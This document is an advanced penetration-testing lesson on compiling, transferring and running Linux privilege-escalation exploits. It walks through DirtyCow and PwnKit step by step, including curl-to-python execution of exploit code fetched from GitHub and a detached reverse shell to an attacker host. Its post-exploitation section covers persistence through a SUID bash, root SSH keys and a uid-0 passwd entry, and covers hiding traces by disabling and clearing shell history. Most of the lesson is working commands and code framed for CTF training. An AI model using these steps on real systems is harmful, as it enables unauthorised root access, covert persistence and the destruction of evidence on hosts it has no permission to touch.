Kernel Exploit Execution

Level: advanced | Time: 40 min | Format: writeup

Compiling and running kernel exploits

Learning Objectives

  • Compile kernel exploits
  • Transfer exploits safely
  • Execute kernel exploits
  • Handle exploit failures

You've … and found a potential vulnerability. Now comes the scary part: actually running the exploit. Kernel exploitation is like performing surgery on a running patient. One wrong move and the whole system crashes.

This lesson covers the practical steps: compiling exploits, transferring them, executing them safely, and what to do when things go wrong. We'll walk through real examples step by step.

Last Resort Warning

Kernel exploits should be your LAST option. Exhaust the safer paths first: sudo rules, SUID/SGID binaries, capabilities, cron jobs, writable service files, credentials lying on disk. A kernel exploit can panic the box, corrupt files it races against, and it leaves traces (dmesg output, crash dumps, the binary itself). In a CTF a panic means losing your shell and often the box; on a client engagement it means an outage you have to explain.

Compiling Kernel Exploits

bash
# Most kernel exploits are C source. You compile them for the TARGET's
# architecture and, ideally, its libc - not for your attack box.

# On the TARGET: check architecture and kernel first
uname -m
# x86_64, i686, aarch64, armv7l ...
uname -r
# the kernel build the exploit has to match

# On your attack machine (Kali), for a 64-bit x86 target
gcc exploit.c -o exploit

# Compile for a 32-bit x86 target from a 64-bit machine (needs gcc-multilib)
gcc -m32 exploit.c -o exploit

# Some exploits need specific flags
gcc exploit.c -o exploit -lpthread          # Threading library (race-condition exploits)
gcc exploit.c -o exploit -static            # Static linking: no dependency on the target's
                                            # libc version ("GLIBC_2.xx not found" goes away)
gcc exploit.c -o exploit -pthread -lcrypt   # Multiple libraries

# Check what the exploit needs - read the header!
head -50 exploit.c
# Look for: gcc commands, required libraries, compilation notes, target kernel versions

# Example real headers:
# // gcc -o exploit exploit.c -lpthread
# // Compile: gcc -pthread exploit.c -o exploit
# // Requires: libcrypt
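Reading the header by hand is fine for one exploit; when you are working through several candidates it helps to script the two questions above (what compile line did the author give, and which libraries does the code actually call) and to derive -m32/-static from the target rather than remembering them. The following is an added example written for this lesson, not code from the page or from any exploit author. `make_sample_source` writes a constructed stand-in exploit with a typical header comment, and the grep patterns are assumptions about how such headers and sources usually look.

```bash
#!/usr/bin/env bash
# Added example for this lesson (not the page's code): infer the gcc command
# for an exploit source. make_sample_source writes a CONSTRUCTED stand-in
# with a typical header comment; it is not a real exploit.

make_sample_source() {   # $1 = path to write
    cat > "$1" <<'EOF'
/*
 * Constructed sample source, not a real exploit.
 * Compile: gcc -pthread exploit.c -o exploit -lcrypt
 */
#include <pthread.h>
#include <crypt.h>
static void *worker(void *p) { return p; }
int main(void) {
    pthread_t t;
    pthread_create(&t, 0, worker, 0);
    crypt("x", "yy");
    return 0;
}
EOF
}

# The compile line most authors leave in the first comment block, if any.
header_compile_cmd() {   # $1 = path to .c file
    head -n 50 "$1" | grep -m1 -oE 'gcc .*' | sed 's/[[:space:]]*$//'
}

# Link flags inferred from the calls the code makes. Forgetting one is the
# usual cause of "undefined reference to `pthread_create'" at link time.
guess_link_flags() {     # $1 = path to .c file
    local src=$1 flags=""
    grep -qE 'pthread_(create|join)[[:space:]]*\(' "$src" && flags="$flags -pthread"
    grep -qE '(^|[^A-Za-z0-9_])crypt[[:space:]]*\(' "$src" && flags="$flags -lcrypt"
    grep -qE '(^|[^A-Za-z0-9_])dl(open|sym)[[:space:]]*\(' "$src" && flags="$flags -ldl"
    grep -qE '(^|[^A-Za-z0-9_])(sqrt|pow|log)[[:space:]]*\(' "$src" && flags="$flags -lm"
    printf '%s\n' "${flags# }"
}

# Full command. $3 is the TARGET's `uname -m` (not the build box's); a 32-bit
# x86 target gets -m32, which needs gcc-multilib on a 64-bit host. $4 = yes
# adds -static so the binary does not depend on the target's libc version.
build_command() {        # $1 = src, $2 = output, $3 = target arch, $4 = static?
    local src=$1 out=$2 arch=${3:-x86_64} static=${4:-no} cmd flags
    cmd=$(header_compile_cmd "$src")
    if [ -z "$cmd" ]; then
        cmd="gcc $src -o $out"
        flags=$(guess_link_flags "$src")
        if [ -n "$flags" ]; then cmd="$cmd $flags"; fi
    fi
    case "$arch" in i[3456]86) cmd="$cmd -m32" ;; esac
    if [ "$static" = yes ]; then cmd="$cmd -static"; fi
    printf '%s\n' "$cmd"
}

# Demo: the constructed source carries a header line, so that is what we get,
# plus -m32 and -static for a 32-bit target.
src=$(mktemp -d)/exploit.c
make_sample_source "$src"
build_command "$src" exploit i686 yes
```

When the header has a compile line, the author's own invocation wins; the inferred flags are only a fallback for sources with no instructions. Either way, the result is a command string to review, not something to pipe straight into a shell.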

Cross-Compilation

bash
# If target is different architecture than attacker:

# Compile 32-bit on 64-bit Kali
sudo apt install gcc-multilib
gcc -m32 exploit.c -o exploit32

# Cross-compile for ARM (rare but possible)
sudo apt install gcc-arm-linux-gnueabi
arm-linux-gnueabi-gcc exploit.c -o exploit_arm

# Static compilation - includes all libraries
# Useful when target has different (usually older) library versions
gcc exploit.c -o exploit -static
# Warning: Creates larger binary

# Check resulting binary - the class and machine must agree with the
# target's uname -m before you bother transferring it
file exploit
# exploit: ELF 64-bit LSB executable, x86-64...

Compile on Target

If the target has GCC installed, compile there: the binary then matches the target's architecture and libc automatically, and you transfer a few kilobytes of text instead of a binary. Check first with `which gcc cc`; production boxes often have no compiler, and some exploits need libc or kernel headers the target lacks.

Transferring Exploits

bash
# Method 1: Python HTTP server (most common)
# On attacker:
python3 -m http.server 8000
# Or Python 2:
python -m SimpleHTTPServer 8000

# On target:
wget http://ATTACKER_IP:8000/exploit
# or
curl http://ATTACKER_IP:8000/exploit -o exploit
chmod +x exploit

# Method 2: Netcat
# On attacker:
nc -lvnp 4444 < exploit
# On target:
nc ATTACKER_IP 4444 > exploit
# Some nc builds never close the connection by themselves: wait until
# ls -l exploit stops growing, then Ctrl+C, then compare hashes
chmod +x exploit

# Method 3: Base64 (if no network tools)
# On attacker:
base64 exploit | tr -d '\n'
# Copy output (a binary becomes one very long line; paste buffers can truncate it)

# On target:
echo "BASE64_STRING_HERE" | base64 -d > exploit
chmod +x exploit

# Whatever the method: verify the copy before you run it
sha256sum exploit
# run on both ends, the digests must match

# Method 4: SCP (if you have SSH)
scp exploit user@target:/tmp/exploit

# Method 5: Upload directory (web shell)
# If you have file upload capability, use that

# Good locations to store exploits (check they are not mounted noexec):
/tmp/
/dev/shm/       # RAM-backed tmpfs, nothing written to disk
/var/tmp/
$HOME/
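A corrupted transfer is one of the commonest reasons a working exploit "segfaults" on the target: the base64 paste lost its tail, or nc was interrupted short. The added example below (not from the lesson) pairs the base64 method with a hash check on both ends and refuses to mark the file executable if the digests differ. It assumes `sha256sum` (coreutils) or `shasum` (BSD/macOS) exists on both ends; any other hash tool works the same way, and the 3000-byte "exploit" it transfers is just constructed random data.

```bash
#!/usr/bin/env bash
# Added example for this lesson (not the page's code): base64 transfer with an
# integrity check. Assumes sha256sum (coreutils) or shasum (BSD/macOS) exists
# on both ends; any other hash tool works the same way.

sha256_of() {   # $1 = file; prints the hex digest only
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Attacker side: print the hash, then the whole file as ONE base64 line.
b64_pack() {    # $1 = file to send
    printf 'SHA256=%s\n' "$(sha256_of "$1")"
    base64 < "$1" | tr -d '\n'
    printf '\n'
}

# Target side: decode the pasted blob, verify it against the hash read off the
# attacker's screen, and only then chmod +x. A short or mangled paste often
# decodes happily into garbage, which is why the hash check has to come first.
b64_unpack() {  # $1 = base64 blob, $2 = expected sha256, $3 = output path
    local blob=$1 expected=$2 out=$3 got
    if ! printf '%s' "$blob" | base64 -d > "$out" 2>/dev/null; then
        echo "base64 decode failed: paste is truncated or mangled" >&2
        rm -f "$out"; return 1
    fi
    got=$(sha256_of "$out")
    if [ "$got" != "$expected" ]; then
        echo "hash mismatch (got $got): refusing to chmod +x" >&2
        rm -f "$out"; return 1
    fi
    chmod +x "$out"
}

# Demo on a constructed 3000-byte "exploit" of random bytes: pack it as the
# attacker would, then unpack and verify it as the target would.
demo=$(mktemp -d)
head -c 3000 /dev/urandom > "$demo/exploit"
b64_pack "$demo/exploit" > "$demo/paste.txt"          # what you copy on the attacker
expected=$(sed -n '1s/^SHA256=//p' "$demo/paste.txt")
blob=$(sed -n '2p' "$demo/paste.txt")
b64_unpack "$blob" "$expected" "$demo/received" && echo "transfer verified"
```

On the target you type the `SHA256=` value and the blob from your attacker terminal into `b64_unpack` by hand; if the paste was cut short the file is removed rather than left behind looking like an exploit.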

/dev/shm for Stealth

/dev/shm is a tmpfs held in RAM: nothing is written to disk, and the file vanishes on reboot, so there is less for disk forensics to recover. It is not invisible, though: the file shows up in ls, the process in ps and auditd, and hardened systems mount /dev/shm (and /tmp) noexec. If ./exploit answers "Permission denied" despite chmod +x, check `mount | grep shm` before blaming the binary.

Running Kernel Exploits

bash
# Before running - get a backup shell!
# A backup on the SAME host only helps when the exploit kills your process or
# session (segfault, hung terminal, broken pty). If the kernel panics, every
# shell on the box dies; then your only fallback is re-running initial access.

# Start a second reverse shell to the attacker, detached from this session
# so it survives if this shell dies (attacker: nc -lvnp 4445 first)
setsid bash -c 'bash -i >& /dev/tcp/ATTACKER/4445 0>&1' &
# Now you have a backup if the exploit takes this session with it

# Basic execution
cd /tmp
./exploit

# Some exploits need arguments - read the usage in the source
./exploit 0             # e.g. an offset value
./exploit --target 1    # e.g. a target kernel build index

# Common patterns:

# DirtyCow pattern (writes into a root-owned file at offset 0, i.e. over
# root's own line - keep a copy of /etc/passwd first)
./dirtycow /etc/passwd "hacker:x:0:0::/root:/bin/bash"

# Generic "spawn root shell" pattern
./exploit
# id
# uid=0(root) gid=0(root)

# PwnKit pattern (userland SUID bug, not a kernel bug)
./pwnkit
# Drops you straight into a root shell

# Some exploits tell you what to run afterwards
./exploit
# Exploit says: "Now run: su - hacker"
su - hacker

Handling Exploit Failures

bash
# If exploit crashes the shell but system survives:
# Reconnect via your backup shell

# If exploit hangs:
# Ctrl+C to cancel (might not work)
# Kill from backup shell:
pkill -9 exploit

# If exploit errors:
# Read the error carefully!

# Common errors:
# "cannot execute binary file"   - wrong architecture
# "Segmentation fault"           - wrong kernel build/offsets, or a race that did not land
# "Permission denied"            - missing chmod +x, or filesystem mounted noexec
# "No such file or directory" (file is right there) - the ELF loader it was
#     linked against (e.g. 32-bit ld-linux) is not on the target; rebuild -static
# "error while loading shared libraries: libX.so" - missing library; -static or install it
# "version GLIBC_2.xx not found" - built on a newer libc than the target; -static
# "Kernel not vulnerable"        - the exploit's own check failed; believe it

# Wrong architecture:
./exploit
# bash: ./exploit: cannot execute binary file
# Solution: Recompile for correct arch (compare: file exploit / uname -m)

# Missing library:
./exploit
# ./exploit: error while loading shared libraries: libpthread.so.0
# Solution: Compile with -static or install library

# noexec mount (Permission denied even after chmod +x):
mount | grep -E ' /tmp | /dev/shm '
# Solution: stage it on a filesystem without noexec ($HOME, /var/tmp, ...)

# If exploit partially works (creates files but no root):
# Check what it created
ls -la /tmp/
# Maybe a SUID shell was created?
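Most of the errors above are predictable from the binary and the mount it sits on, so they can be checked before anything is executed. The added example below (not from the lesson) reads the ELF header with `od` to get the architecture, compares it with `uname -m`, and checks the executable bit, the noexec mount option and whether the binary is dynamically linked. The two-byte `e_machine` table is an assumption limited to the four architectures this lesson mentions; anything else is reported as unknown, and `findmnt` is assumed to be present (util-linux, Linux only).

```bash
#!/usr/bin/env bash
# Added example for this lesson (not the page's code): pre-flight checks that
# catch the failures listed above before you execute anything. The e_machine
# table is an assumption limited to the architectures this lesson mentions.

# Architecture string (as `uname -m` would print it) from the ELF header:
# bytes 0-3 magic, bytes 18-19 e_machine (little-endian). Returns 1 if not ELF.
elf_arch() {   # $1 = binary
    local f=$1 magic machine
    magic=$(od -An -tx1 -N4 "$f" | tr -d ' \n')
    if [ "$magic" != "7f454c46" ]; then echo "not-elf"; return 1; fi
    machine=$(od -An -tx1 -j18 -N2 "$f" | tr -d ' \n')
    case "$machine" in
        3e00) echo x86_64 ;;
        0300) echo i686 ;;
        b700) echo aarch64 ;;
        2800) echo armv7l ;;
        *)    echo "unknown-$machine" ;;
    esac
}

# Does a binary of arch $1 run on a host whose `uname -m` is $2?
arch_matches() {
    case "$1:$2" in
        x86_64:x86_64|aarch64:aarch64) return 0 ;;
        i686:i[3456]86)                return 0 ;;
        armv7l:armv[67]l)              return 0 ;;
    esac
    return 1
}

# Prints one FAIL/NOTE line per problem; returns non-zero if anything FAILed.
preflight() {   # $1 = path to the staged exploit binary
    local bin=$1 want have rc=0 opts
    want=$(elf_arch "$bin") || { echo "FAIL: $bin is not an ELF binary"; return 1; }
    have=$(uname -m)
    if ! arch_matches "$want" "$have"; then
        echo "FAIL: binary is $want, target is $have -> recompile (-m32/-m64 or cross-compiler)"
        rc=1
    fi
    if [ ! -x "$bin" ]; then
        echo "FAIL: not executable -> chmod +x $bin"; rc=1
    fi
    # /tmp and /dev/shm are often mounted noexec: execve fails with
    # "Permission denied" no matter what chmod says. findmnt is util-linux.
    if opts=$(findmnt -no OPTIONS --target "$bin" 2>/dev/null) && echo "$opts" | grep -qw noexec; then
        echo "FAIL: filesystem under $bin is mounted noexec -> stage it somewhere else"; rc=1
    fi
    # A dynamically linked exploit needs the target's libc/pthread/crypt; the
    # loader path string is a cheap tell. -static removes the dependency.
    if grep -aqE 'ld-linux|ld-musl' "$bin"; then
        echo "NOTE: dynamically linked; on 'GLIBC_2.xx not found' or a missing .so, rebuild with -static"
    fi
    return $rc
}

# Usage on the target, after staging and chmod +x:
#   preflight /tmp/exploit && ./exploit
```

A FAIL from `preflight` is cheaper than the corresponding runtime error: nothing has touched the kernel yet, and the fix (recompile, move the file, chmod) is obvious from the message.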

DirtyCow Walkthrough

DirtyCow (CVE-2016-5195) is a race condition in the kernel's copy-on-write handling of private file mappings: an unprivileged user can win the race and write into a read-only, root-owned file such as /etc/passwd. It is one of the most famous kernel exploits. Let's walk through using it step by step.

bash
# Check the kernel. Upstream fixed it in 4.8.3 / 4.7.9 / 4.4.26 (October 2016),
# but distros backported the fix into older version strings, so compare against
# your distro's advisory rather than the bare number.
uname -r
# 3.13.0-32-generic - a pre-fix Ubuntu 14.04 kernel, VULNERABLE

# Search for exploit
searchsploit dirty cow
searchsploit -m linux/local/40839.c    # passwd overwrite version

# Transfer to target
python3 -m http.server 8000
# On target:
wget http://ATTACKER:8000/40839.c

# Compile on target (if GCC available)
gcc -pthread 40839.c -o dirty -lcrypt

# Or compile on attacker and transfer the binary (static, so the target's libc doesn't matter)
gcc -pthread 40839.c -o dirty -lcrypt -static

# Run the exploit
./dirty
# Please enter the new password:
# Type your password (e.g., "hacked")

# Exploit runs... it copies /etc/passwd to /tmp/passwd.bak, then overwrites
# the START of the file (root's own line) with the new entry:
# Complete line:
# firefart:<crypt hash>:0:0:pwned:/root:/bin/bash

# Now switch to the new root user
su firefart
# Password: hacked
id
# uid=0(root) gid=0(root)

# When you are done: put the original file back, or root stays broken
mv /tmp/passwd.bak /etc/passwd

# Alternative: DirtyCow SUID version
searchsploit -m linux/local/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow
# Backs up /usr/bin/passwd, then overwrites it with a root-shell SUID binary

DirtyCow Side Effects

DirtyCow is a race, and the PoC writes into live system files while it runs. The passwd version does not append an account: it overwrites the beginning of /etc/passwd, so root's own line (and often part of the next one) is gone until you `mv /tmp/passwd.bak /etc/passwd`. Back up anything you let it write to, restore before you disconnect, and confirm with `head -1 /etc/passwd`. If the race does not land on the first try, resist hammering it: repeated attempts on some kernels end in a crash.

PwnKit Walkthrough

bash
# PwnKit (CVE-2021-4034) - argument-handling bug in pkexec (polkit)
# Present in pkexec since its first release in 2009, disclosed January 2022,
# so nearly every distro shipped a vulnerable build at some point

# Check if vulnerable
pkexec --version
# 0.105 is what most older distros ship - but patched packages keep the same
# version string, so check the package changelog / advisory as well:
dpkg -s policykit-1 2>/dev/null | grep -i '^Version'   # Debian/Ubuntu
rpm -q polkit 2>/dev/null                              # RHEL/Fedora
# And the precondition: pkexec must be SUID root, or there is nothing to exploit
ls -l "$(command -v pkexec)"
# -rwsr-xr-x 1 root root ... /usr/bin/pkexec

# Multiple exploit versions available
# Method 1: One-liner Python version (pulls code from GitHub onto the target:
# needs outbound internet and shows up in DNS/proxy logs)
python3 -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.py)"

# Method 2: Compiled version
wget https://github.com/ly4k/PwnKit/raw/main/PwnKit
chmod +x PwnKit
./PwnKit
# root@victim:/tmp# id
# uid=0(root) gid=0(root)

# Method 3: Build yourself (you can read what you run, and it links against the target's libc)
git clone https://github.com/berdav/CVE-2021-4034
cd CVE-2021-4034
make
./cve-2021-4034
# Instant root shell

# Method 4: If curl/wget blocked
# Base64 encode on attacker, paste on target
base64 PwnKit | tr -d '\n'
# On target:
echo "BASE64HERE" | base64 -d > /tmp/pwnkit
chmod +x /tmp/pwnkit
/tmp/pwnkit

PwnKit is Reliable

PwnKit is not a kernel exploit at all: it abuses a SUID-root userland helper (pkexec), so there is no race to win and no kernel memory to corrupt, and it almost never crashes anything. That makes it a good first choice when the binary is present and SUID. Check the pkexec version and, because patched packages keep the old version string, the distro package version too.

Fixing Compilation Errors

bash
# Common compilation issues and fixes:

# Missing header files
exploit.c:5:10: fatal error: linux/netfilter.h: No such file or directory
# Fix: the userspace copies of linux/*.h come from the libc dev headers
apt install linux-libc-dev            # Debian/Ubuntu (build-essential pulls it in)
# linux-headers-$(uname -r) is for building kernel MODULES, not userland exploits

# Undefined reference errors
undefined reference to 'pthread_create'
# Fix: Add library flag
gcc exploit.c -o exploit -lpthread

# Missing standard types
/usr/include/linux/types.h:5: error: unknown type name 'uint64_t'
# Fix: the source forgot #include <stdint.h>; add it near the top
# (A 32/64-bit mismatch looks different - for that, recompile with -m32/-m64)

# Old GCC version issues
# Some exploits need newer C standards
gcc -std=c99 exploit.c -o exploit
# or
gcc -std=gnu99 exploit.c -o exploit

# Runtime "shared library" / "GLIBC_2.xx not found" errors - link statically
gcc exploit.c -o exploit -static
# (-static only changes linking; it does not make compile errors go away)

# Still failing? Read exploit comments
head -100 exploit.c
# Authors often explain exact compilation

Post-Exploitation Steps

bash
# Once the exploit succeeds and you have root:

# 0. Stop the shell from writing history before you do anything else
unset HISTFILE

# 1. Verify root
id
whoami

# 2. Get persistent access (don't rely on re-running the exploit)
# SUID bash - check the mount first: /tmp and /dev/shm are often mounted
# nosuid, which silently ignores the setuid bit
findmnt -no OPTIONS --target /tmp
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
# Access: /tmp/rootbash -p      (-p keeps the effective uid)

# SSH key
mkdir -p /root/.ssh
echo "YOUR_SSH_KEY" >> /root/.ssh/authorized_keys

# New user ($1$xyz$abc is a placeholder; make a real hash with
# openssl passwd -6 'yourpassword' and paste it in)
echo 'hacker:$1$xyz$abc:0:0:root:/root:/bin/bash' >> /etc/passwd

# 3. Clean up exploit traces
rm -f /tmp/exploit /dev/shm/exploit
history -c          # clears this session's in-memory history only

# 4. Get the flag (CTF)
cat /root/root.txt

# 5. If this was DirtyCow - restore files
# The passwd PoC overwrote the start of /etc/passwd and left /tmp/passwd.bak
mv /tmp/passwd.bak /etc/passwd
head -1 /etc/passwd   # must be root's line again
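The DirtyCow side-effects note and step 5 here come down to the same chore: put /etc/passwd back, and be sure you did. The added example below (not from the lesson, and not part of any PoC) takes a verified backup, lists every uid-0 account that is not root, and removes an injected account atomically, refusing when the edit would leave no root entry, which is exactly the state the firefart PoC leaves behind because it overwrites root's line rather than appending, so there the only correct fix is restoring the backup. File paths are parameters so it can be exercised on a copy; on a real box they are /etc/passwd and /tmp/passwd.bak.

```bash
#!/usr/bin/env bash
# Added example for this lesson (not the page's code, not part of any PoC):
# verified backup/restore of a passwd file and safe removal of an injected
# uid-0 account. File paths are parameters so it can be exercised on a copy.

# A passwd file is only usable if root (uid 0) is still in it.
passwd_has_root() {   # $1 = passwd file
    awk -F: '$1 == "root" && $3 == 0 { ok = 1 } END { exit !ok }' "$1"
}

# Copy with mode/owner preserved, then prove the copy is byte-identical.
passwd_backup() {     # $1 = live passwd file, $2 = backup path
    cp -p "$1" "$2" && cmp -s "$1" "$2"
}

# Every uid-0 account that is not root: "firefart" after the DirtyCow PoC,
# "hacker" after the append-a-user persistence trick. Empty output = clean.
extra_uid0_accounts() {   # $1 = passwd file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Remove one account line, writing to a temp file and renaming it into place
# so a crash mid-edit cannot leave a truncated passwd (which locks everyone
# out). Refuses if the result would have no root entry.
passwd_remove_user() {    # $1 = passwd file, $2 = username
    local f=$1 user=$2 tmp
    tmp=$(mktemp "$f.XXXXXX") || return 1
    cp -p "$f" "$tmp" || { rm -f "$tmp"; return 1; }          # keep mode/owner
    awk -F: -v u="$user" '$1 != u' "$f" > "$tmp" || { rm -f "$tmp"; return 1; }
    if ! passwd_has_root "$tmp"; then
        echo "refusing: removing '$user' would leave no uid-0 root line; restore the backup instead" >&2
        rm -f "$tmp"; return 1
    fi
    mv "$tmp" "$f"
}

# Put the backup back, but only a backup that still contains root.
passwd_restore() {    # $1 = backup, $2 = live passwd file
    passwd_has_root "$1" || { echo "backup has no root entry, not restoring" >&2; return 1; }
    cp -p "$1" "$2" && cmp -s "$1" "$2"
}

# On a real box:
#   passwd_backup /etc/passwd /tmp/passwd.bak     # before running the PoC
#   extra_uid0_accounts /etc/passwd               # after: what did it leave?
#   passwd_restore /tmp/passwd.bak /etc/passwd    # when you are done
```

The refusal in `passwd_remove_user` is the important edge case: after the firefart PoC, `extra_uid0_accounts` reports `firefart`, but deleting that line would delete the only uid-0 entry, so the function declines and you restore the backup instead. An appended `hacker` line, the persistence method above, is removed in place and the file compares equal to the backup again.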

Kernel Exploitation Methodology

Kernel Exploit Execution Flow

  1. Backup: get a second shell first, and know how to regain access if the box panics
  2. Compile: for the target's architecture and libc, with the libraries the source needs
  3. Transfer: upload via HTTP, nc, or base64, then compare hashes on both ends
  4. Stage: place in /tmp or /dev/shm (not mounted noexec), chmod +x
  5. Execute: run with any required arguments
  6. Persist: create SUID bash or add an SSH key immediately, then restore anything the exploit overwrote

Knowledge Check

Why should you create a backup shell before running a kernel exploit?

Challenges

Exploit a Vulnerable Kernel

Challenge (advanced)

Given a Linux system with kernel 3.13.0-24 (Ubuntu 14.04), compile and execute a kernel exploit to gain root access.


Key Takeaways

  • Get a backup shell before running a kernel exploit; it saves you from a dead session, not from a kernel panic
  • Match the build to the target: architecture (x86_64 vs i686) and libc version
  • Link with -static so the binary carries its own libc and needs nothing on the target
  • /dev/shm is RAM-backed tmpfs, good for staging exploits, but check it is not mounted noexec
  • Read exploit headers for compile instructions and required arguments
  • Create persistent access immediately after gaining root, then undo what the exploit broke (e.g. restore /etc/passwd)